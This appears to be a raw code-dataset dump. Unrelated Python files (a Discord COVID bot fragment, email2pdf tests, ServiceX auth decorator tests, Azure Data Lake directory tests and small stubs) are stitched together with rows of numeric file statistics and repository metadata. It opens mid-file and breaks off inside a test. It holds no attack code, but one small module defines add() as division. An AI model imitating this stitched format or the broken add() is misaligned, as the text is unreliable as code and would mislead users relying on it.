#print(f'사망자: {todaydead} 명')
covidembed = discord.Embed(title='코로나19 국내 발생현황', description="", color=0xFF0F13, url='http://ncov.mohw.go.kr/')
covidembed.add_field(name='🦠 확진환자', value=f'{totalcovid}({todaytotalcovid}) 명'
f'\n\n국내발생: {todaydomecovid} 명\n해외유입: {todayforecovid} 명', inline=False)
covidembed.add_field(name='😷 격리중', value=f'{totalcaing}({todaycaing}) 명', inline=False)
covidembed.add_field(name='🆓 격리해제', value=f'{totalca}({todayca}) 명', inline=False)
covidembed.add_field(name='💀 사망자', value=f'{totaldead}({todaydead}) 명', inline=False)
covidembed.set_footer(text=datecr.string)
await message.channel.send(embed=covidembed)
| 48.20438
| 120
| 0.608268
| 888
| 6,604
| 4.476351
| 0.120496
| 0.049811
| 0.036226
| 0.042264
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.01104
| 0.218201
| 6,604
| 136
| 121
| 48.558824
| 0.756537
| 0.203362
| 0
| 0.970149
| 0
| 0.044776
| 0.271624
| 0.046812
| 0
| 0
| 0.004623
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a2ea0b4604e8a34db8d23be89cbe79ef79b9a69
| 105
|
py
|
Python
|
src/ros_cython_example/__init__.py
|
ztaye3/cython_catkin_example-master
|
728e91d7977f929c09929bf05a9c3f9a9b5898d6
|
[
"MIT"
] | 10
|
2016-06-26T07:47:12.000Z
|
2022-03-25T01:28:27.000Z
|
src/ros_cython_example/__init__.py
|
ztaye3/cython_catkin_example-master
|
728e91d7977f929c09929bf05a9c3f9a9b5898d6
|
[
"MIT"
] | 3
|
2019-01-26T03:33:37.000Z
|
2020-06-19T10:44:12.000Z
|
src/ros_cython_example/__init__.py
|
ztaye3/cython_catkin_example-master
|
728e91d7977f929c09929bf05a9c3f9a9b5898d6
|
[
"MIT"
] | 2
|
2018-08-24T01:15:43.000Z
|
2020-09-16T21:26:02.000Z
|
from add_two_ints import *
from sub_two_ints import *
from mul_two_ints import *
from fibonacci import *
| 21
| 26
| 0.809524
| 18
| 105
| 4.388889
| 0.444444
| 0.265823
| 0.493671
| 0.64557
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152381
| 105
| 4
| 27
| 26.25
| 0.88764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e03375726e2ce3461b59dc06044ac07300d735e5
| 7,139
|
py
|
Python
|
tests/Direct/test_Direct_AttachmentDetection.py
|
aktivkohle/email2pdf
|
0ffc0212863b1935ac671ed3308dd7f43873d907
|
[
"MIT"
] | 59
|
2015-10-26T15:33:37.000Z
|
2022-02-25T08:17:10.000Z
|
tests/Direct/test_Direct_AttachmentDetection.py
|
aktivkohle/email2pdf
|
0ffc0212863b1935ac671ed3308dd7f43873d907
|
[
"MIT"
] | 84
|
2015-01-03T17:38:26.000Z
|
2021-12-11T11:43:18.000Z
|
tests/Direct/test_Direct_AttachmentDetection.py
|
aktivkohle/email2pdf
|
0ffc0212863b1935ac671ed3308dd7f43873d907
|
[
"MIT"
] | 38
|
2015-06-10T15:22:20.000Z
|
2022-03-31T19:16:17.000Z
|
from email.mime.multipart import MIMEMultipart
import os
from tests.BaseTestClasses import Email2PDFTestCase
class AttachmentDetection(Email2PDFTestCase):
def setUp(self):
super(AttachmentDetection, self).setUp()
self.msg = MIMEMultipart()
def test_pdf_as_octet_stream(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", mainContentType="application", subContentType="octet-stream")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", extension="pdf")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_as_octet_stream_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", extension="xyz", mainContentType="application", subContentType="octet-stream")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_pdf_as_octet_stream_no_body(self):
self.addHeaders()
self.attachText("Some basic textual content")
filename = self.attachPDF("Some PDF content", mainContentType="application", subContentType="octet-stream")
error = self.invokeDirectly(extraParams=['--no-body'])
self.assertEqual('', error)
self.assertFalse(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, filename)))
self.assertRegex(self.getPDFText(os.path.join(self.workingDir, filename)), "Some PDF content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_jpeg_as_octet_stream(self):
self.addHeaders()
self.attachText("Some basic textual content")
image_filename = self.attachImage(jpeg=True, content_type="application/octet-stream")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, image_filename)))
self.assertIsJPG(os.path.join(self.workingDir, image_filename))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_jpeg_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
image_filename = self.attachImage(jpeg=True, extension="blah")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, image_filename)))
self.assertIsJPG(os.path.join(self.workingDir, image_filename))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_jpeg_as_octet_stream_with_invalid_extension(self):
self.addHeaders()
self.attachText("Some basic textual content")
image_filename = self.attachImage(jpeg=True, content_type="application/octet-stream", extension="xyz")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, image_filename)))
self.assertIsJPG(os.path.join(self.workingDir, image_filename))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_word_document(self):
self.addHeaders()
self.attachText("Some basic textual content")
self.attachAttachment("application", "vnd.openxmlformats-officedocument.wordprocessingml.document",
"Word document content", "somefile.docx")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, "somefile.docx")))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_unidentified_file(self):
self.addHeaders()
self.attachText("Some basic textual content")
self.attachAttachment("application", "data", "some data in some format", "somefile.xyz")
error = self.invokeDirectly()
self.assertEqual('', error)
self.assertTrue(self.existsByTime())
self.assertTrue(os.path.exists(os.path.join(self.workingDir, "somefile.xyz")))
self.assertRegex(self.getPDFText(self.getTimedFilename()), "Some basic textual content")
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
def test_attachment_filename_has_encoding(self):
path = os.path.join(self.workingDir, "somefile.xyz")
self.attachAttachment("application", "data", "some data in some format", "somefile.xyz", file_name_encoding="utf-8")
(rc, output, error) = self.invokeAsSubprocess(extraParams=['--no-body'])
self.assertTrue(os.path.exists(path))
self.assertEqual('', error)
self.assertFalse(self.existsByTimeWarning())
self.assertFalse(self.existsByTimeOriginal())
| 52.492647
| 132
| 0.701359
| 748
| 7,139
| 6.617647
| 0.113636
| 0.032727
| 0.080606
| 0.07899
| 0.902222
| 0.89697
| 0.883838
| 0.883838
| 0.860606
| 0.860606
| 0
| 0.000509
| 0.174534
| 7,139
| 135
| 133
| 52.881481
| 0.839471
| 0
| 0
| 0.727273
| 0
| 0
| 0.135313
| 0.014988
| 0
| 0
| 0
| 0
| 0.528926
| 1
| 0.090909
| false
| 0
| 0.024793
| 0
| 0.123967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0ee35ff60a09434cd6ba68e42216976aad94ea3c
| 101
|
py
|
Python
|
gym-foster/gym_foster/envs/__init__.py
|
c4sgub/counterfactual_RL
|
9dbdf53935fbe6f8da45235bc1284fc855740a46
|
[
"MIT"
] | null | null | null |
gym-foster/gym_foster/envs/__init__.py
|
c4sgub/counterfactual_RL
|
9dbdf53935fbe6f8da45235bc1284fc855740a46
|
[
"MIT"
] | null | null | null |
gym-foster/gym_foster/envs/__init__.py
|
c4sgub/counterfactual_RL
|
9dbdf53935fbe6f8da45235bc1284fc855740a46
|
[
"MIT"
] | null | null | null |
from gym_foster.envs.foster_env import FosterEnv
from gym_foster.envs.fosterA_env import FosterAEnv
| 25.25
| 50
| 0.871287
| 16
| 101
| 5.25
| 0.5625
| 0.166667
| 0.309524
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089109
| 101
| 3
| 51
| 33.666667
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ee63f7a4811a04bdd2037059e1870fffabc37d7
| 11,045
|
py
|
Python
|
tests/test_decorators.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_decorators.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_decorators.py
|
zorache/ServiceX_App
|
4479afa0f019bbdcd35812691e78abba442c9d37
|
[
"BSD-3-Clause"
] | null | null | null |
from flask import url_for, Response, make_response
from flask_jwt_extended import create_access_token
from tests.web.web_test_base import WebTestBase
def fake_route() -> Response:
return make_response({'data': 'abc123'})
class TestDecorators(WebTestBase):
@staticmethod
def fake_header():
access_token = create_access_token(identity='abcd')
return {'Authorization': f'Bearer {access_token}'}
def test_oauth_decorator_auth_disabled(self, client):
from servicex.decorators import oauth_required
with client.application.app_context():
decorated = oauth_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_oauth_decorator_not_signed_in(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import oauth_required
decorated = oauth_required(fake_route)
response = decorated()
assert response.status_code == 302
assert response.location == url_for('sign_in')
def test_oauth_decorator_not_saved(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.session_transaction() as sess:
sess['is_authenticated'] = True
response: Response = client.get(url_for('profile'))
assert response.status_code == 302
assert response.location == url_for('create_profile', _external=True)
def test_oauth_decorator_saved(self, client, user, captured_templates):
client.application.config['ENABLE_AUTH'] = True
user.id = 7
with client.session_transaction() as sess:
sess['is_authenticated'] = True
sess['user_id'] = user.id
resp: Response = client.get(url_for('profile'))
assert resp.status_code == 200
template, context = captured_templates[0]
assert template.name == "profile.html"
assert context["user"] == user
def test_auth_decorator_auth_disabled(self, client):
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_auth_decorator_user_deleted(self, mocker, mock_jwt_extended):
mocker.patch('servicex.decorators.UserModel.find_by_sub',
return_value=None)
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 401
def test_auth_decorator_user_pending(self, mock_jwt_extended, user):
user.pending = True
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 401
def test_auth_decorator_authorized(self, mocker, mock_jwt_extended, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_admin_decorator_auth_disabled(self, client):
with client.application.app_context():
from servicex.decorators import admin_required
decorated = admin_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_admin_decorator_unauthorized(self, mocker, mock_jwt_extended, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
user.admin = False
with client.application.app_context():
from servicex.decorators import admin_required
decorated = admin_required(fake_route)
response: Response = decorated()
assert response.status_code == 401
def test_admin_decorator_authorized(self, mock_jwt_extended, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
user.admin = True
with client.application.app_context():
from servicex.decorators import admin_required
decorated = admin_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_auth_decorator_integration_auth_disabled(self, mocker, client):
fake_transform_id = 123
data = {'id': fake_transform_id}
mock = mocker.patch('servicex.resources.transformation_request'
'.TransformRequest.return_request').return_value
mock.to_json.return_value = data
with client.application.app_context():
response: Response = client.get(f'servicex/transformation/{fake_transform_id}')
print(response.data)
assert response.status_code == 200
assert response.json == data
def test_auth_decorator_integration_no_header(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('servicex/transformation/123')
print(response.data)
assert response.status_code == 401
assert response.json['message'] == 'Missing Authorization Header'
def test_auth_decorator_integration_user_deleted(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('servicex/transformation/123',
headers=self.fake_header())
assert response.status_code == 401
assert 'deleted' in response.json['message']
def test_auth_decorator_integration_user_pending(self, mocker, user):
user.pending = True
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('servicex/transformation/123',
headers=self.fake_header())
assert response.status_code == 401
assert 'pending' in response.json['message']
def test_auth_decorator_integration_authorized(self, mocker, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
fake_transform_id = 123
data = {'id': fake_transform_id}
mock = mocker.patch('servicex.resources.transformation_request'
'.TransformRequest.return_request').return_value
mock.submitted_by = user.id
mock.to_json.return_value = data
with client.application.app_context():
response: Response = client.get(f'servicex/transformation/{fake_transform_id}',
headers=self.fake_header())
print(response.data)
assert response.status_code == 200
assert response.json == data
def test_auth_decorator_integration_oauth(self, mocker, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
fake_transform_id = 123
data = {'id': fake_transform_id}
mock = mocker.patch('servicex.resources.transformation_request'
'.TransformRequest.return_request').return_value
mock.submitted_by = user.id
mock.to_json.return_value = data
with client.session_transaction() as sess:
sess['is_authenticated'] = True
with client.application.app_context():
response: Response = client.get(f'servicex/transformation/{fake_transform_id}')
print(response.data)
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_auth_disabled(self, mocker, client):
data = {'users': [{'id': 1234}]}
mocker.patch('servicex.models.UserModel.return_all', return_value=data)
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_no_header(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 401
assert response.json['message'] == 'Missing Authorization Header'
def test_admin_decorator_integration_not_authorized(self, user):
user.admin = False
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('users', headers=self.fake_header())
assert response.status_code == 401
assert 'restricted' in response.json['message']
def test_admin_decorator_integration_authorized(self, mocker, user):
user.admin = True
data = {'users': [{'id': 1234}]}
mocker.patch('servicex.models.UserModel.return_all', return_value=data)
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('users', headers=self.fake_header())
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_oauth_authorized(self, mocker, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
data = {'users': [{'id': 1234}]}
mocker.patch('servicex.models.UserModel.return_all', return_value=data)
with client.session_transaction() as sess:
sess['is_authenticated'] = True
sess['admin'] = True
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_oauth_not_authorized(self, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.session_transaction() as sess:
sess['is_authenticated'] = True
sess['admin'] = False
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 401
assert 'restricted' in response.json['message']
| 47.200855
| 91
| 0.657945
| 1,215
| 11,045
| 5.706996
| 0.095473
| 0.064609
| 0.063455
| 0.076147
| 0.881886
| 0.851168
| 0.822469
| 0.799394
| 0.799394
| 0.784396
| 0
| 0.012509
| 0.247261
| 11,045
| 233
| 92
| 47.403433
| 0.821506
| 0
| 0
| 0.741463
| 0
| 0
| 0.105115
| 0.052331
| 0
| 0
| 0
| 0
| 0.190244
| 1
| 0.121951
| false
| 0
| 0.058537
| 0.004878
| 0.195122
| 0.019512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ef7ca1a5f8e6cdd4eafe132d38781d588581723
| 103
|
py
|
Python
|
executable/Vishal_DramaPFAssgn1.py
|
rana-akash/hackFest
|
b6a73c8a38f089a56596e36e7b11ff235a0f5704
|
[
"MIT"
] | null | null | null |
executable/Vishal_DramaPFAssgn1.py
|
rana-akash/hackFest
|
b6a73c8a38f089a56596e36e7b11ff235a0f5704
|
[
"MIT"
] | null | null | null |
executable/Vishal_DramaPFAssgn1.py
|
rana-akash/hackFest
|
b6a73c8a38f089a56596e36e7b11ff235a0f5704
|
[
"MIT"
] | null | null | null |
def add(a,b): return a/b
def sub(a,b): return a-b
def mult(a,b): return a*b
def div(a,b): return a/b
| 25.75
| 26
| 0.631068
| 28
| 103
| 2.321429
| 0.285714
| 0.246154
| 0.492308
| 0.553846
| 0.753846
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174757
| 103
| 4
| 27
| 25.75
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| false
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
0efe487cfc46df57f098746f7d4238db58fa0121
| 428
|
py
|
Python
|
terrascript/resource/netapp_cloudmanager.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/netapp_cloudmanager.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/netapp_cloudmanager.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/netapp_cloudmanager.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:22:08 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.netapp_cloudmanager
#
# instead of
#
# >>> import terrascript.resource.NetApp.netapp_cloudmanager
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.NetApp.netapp_cloudmanager import *
| 28.533333
| 73
| 0.773364
| 53
| 428
| 6.169811
| 0.660377
| 0.232416
| 0.30581
| 0.2263
| 0.262997
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03183
| 0.119159
| 428
| 14
| 74
| 30.571429
| 0.835544
| 0.794393
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1608a99e3bb71ba13e8f586b44469380c2a151d1
| 60,557
|
py
|
Python
|
sdk/storage/azure-storage-file-datalake/tests/test_directory.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | null | null | null |
sdk/storage/azure-storage-file-datalake/tests/test_directory.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | null | null | null |
sdk/storage/azure-storage-file-datalake/tests/test_directory.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import unittest
from datetime import datetime, timedelta
import pytest
from azure.core import MatchConditions
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, \
ResourceModifiedError, ServiceRequestError, AzureError
from azure.storage.filedatalake import ContentSettings, DirectorySasPermissions, DataLakeDirectoryClient, \
generate_file_system_sas, FileSystemSasPermissions
from azure.storage.filedatalake import DataLakeServiceClient, generate_directory_sas
from azure.storage.filedatalake._models import AccessControlChangeResult, AccessControlChangeCounters
from azure.storage.filedatalake._serialize import _SUPPORTED_API_VERSIONS
from settings.testcase import DataLakePreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
TEST_DIRECTORY_PREFIX = 'directory'
REMOVE_ACL = "mask," + "default:user,default:group," + \
"user:ec3595d6-2c17-4696-8caa-7e139758d24a,group:ec3595d6-2c17-4696-8caa-7e139758d24a," + \
"default:user:ec3595d6-2c17-4696-8caa-7e139758d24a,default:group:ec3595d6-2c17-4696-8caa-7e139758d24a"
# ------------------------------------------------------------------------------
class DirectoryTest(StorageTestCase):
def _setUp(self, account_name, account_key):
url = self.account_url(account_name, 'dfs')
self.dsc = DataLakeServiceClient(url, credential=account_key, logging_enable=True)
self.config = self.dsc._config
self.file_system_name = self.get_resource_name('filesystem')
if not self.is_playback():
file_system = self.dsc.get_file_system_client(self.file_system_name)
try:
file_system.create_file_system(timeout=5)
except ResourceExistsError:
pass
def tearDown(self):
if not self.is_playback():
try:
self.dsc.delete_file_system(self.file_system_name)
for file_system in self.dsc.list_file_systems():
self.dsc.delete_file_system(file_system.name)
except:
pass
return super(DirectoryTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_directory_reference(self, prefix=TEST_DIRECTORY_PREFIX):
directory_name = self.get_resource_name(prefix)
return directory_name
def _create_directory_and_get_directory_client(self, directory_name=None):
directory_name = directory_name if directory_name else self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
return directory_client
def _create_sub_directory_and_files(self, directory_client, num_of_dirs, num_of_files_per_dir):
# the name suffix matter since we need to avoid creating the same directories/files in record mode
for i in range(0, num_of_dirs):
sub_dir = directory_client.create_sub_directory(self.get_resource_name('subdir' + str(i)))
for j in range(0, num_of_files_per_dir):
sub_dir.create_file(self.get_resource_name('subfile' + str(j)))
def _create_file_system(self):
return self.dsc.create_file_system(self._get_file_system_reference())
# --Helpers-----------------------------------------------------------------
@DataLakePreparer()
def test_create_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
content_settings = ContentSettings(
content_language='spanish',
content_disposition='inline')
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(content_settings=content_settings)
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_directory_exists(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
directory_client1 = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client2 = self.dsc.get_directory_client(self.file_system_name, "nonexistentdir")
directory_client1.create_directory()
self.assertTrue(directory_client1.exists())
self.assertFalse(directory_client2.exists())
@DataLakePreparer()
def test_using_oauth_token_credential_to_create_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# generate a token with directory level create permission
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
response = directory_client.create_directory()
self.assertIsNotNone(response)
@DataLakePreparer()
def test_create_directory_with_match_conditions(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(match_condition=MatchConditions.IfMissing)
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_create_directory_with_permission(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(permissions="rwxr--r--", umask="0000")
prop = directory_client.get_access_control()
# Assert
self.assertTrue(created)
self.assertEqual(prop['permissions'], 'rwxr--r--')
@DataLakePreparer()
def test_create_directory_with_content_settings(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
content_settings = ContentSettings(
content_language='spanish',
content_disposition='inline')
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(content_settings=content_settings)
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_create_directory_with_metadata(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(metadata=metadata)
properties = directory_client.get_directory_properties()
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_delete_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
directory_client.delete_directory()
@DataLakePreparer()
def test_delete_directory_with_if_modified_since(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
prop = directory_client.get_directory_properties()
with self.assertRaises(ResourceModifiedError):
